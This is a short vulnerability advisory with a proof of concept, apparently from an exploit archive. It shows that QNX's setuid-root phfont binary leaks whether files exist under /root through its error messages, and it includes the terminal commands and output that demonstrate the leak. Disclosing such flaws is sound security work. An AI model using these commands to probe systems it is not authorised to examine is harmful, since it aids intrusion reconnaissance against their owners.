# # QNX 6.x phfont file and directory enumeration vulnerability by cenobyte 2014 # # # - vulnerability description: # QNX setuid root /usr/photon/bin/phfont allows any non-root user to enumerate # files and directories as root due to PfAttachLocalDllArgv() error messages. # # You can discover files and directories by observing the following error # messages and behaviour: # # 1) PfAttachLocalDllArgv(): Function not implemented # A file exists. # 2) PfAttachLocalDllArgv(): No such file or directory # A directory does not exist. # 3) And nothing will be returned when a directory exists. # # - vulnerable platforms: # QNX 6.5.0SP1 # QNX 6.5.0 # QNX 6.4.0 # # - not vulnerable: # QNX 6.3.0 $ id uid=100(user) gid=100 $ /usr/photon/bin/phfont -A -d /root/.ph $ /usr/photon/bin/phfont -A -d /root/doesnotexist $ PfAttachLocalDllArgv(): No such file or directory $ /usr/photon/bin/phfont -A -d /root/.profile $ PfAttachLocalDllArgv(): Function not implemented # ls -l /root total 13 drwx------ 5 root root 1024 Jan 07 16:24 . drwxr-xr-x 16 root root 1024 Oct 09 15:03 .. -rw-rw-r-- 1 root root 51 Jan 24 01:15 .lastlogin drwx------ 3 root root 1024 Sep 26 18:03 .mozilla drwxrwxr-x 3 root root 1024 Sep 27 15:36 .ph -rw-r--r-- 1 root root 191 Apr 20 2001 .profile drwx------ 2 root root 1024 Sep 26 18:11 .ssh